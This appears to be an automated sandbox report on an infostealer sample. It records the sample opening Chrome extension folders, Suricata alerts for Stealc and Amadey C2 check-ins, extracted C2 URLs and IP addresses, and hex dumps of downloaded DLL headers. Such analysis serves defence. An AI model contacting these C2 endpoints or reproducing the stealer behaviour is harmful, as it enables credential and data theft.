Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49715 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49715 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.6:49715
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49715 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.6:49715
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49715 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:50101 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:50108

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Nov 2024 23:25:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Nov 2024 23:25:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Nov 2024 23:25:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Nov 2024 23:25:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Nov 2024 23:25:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Nov 2024 23:25:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 25 Nov 2024 23:25:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 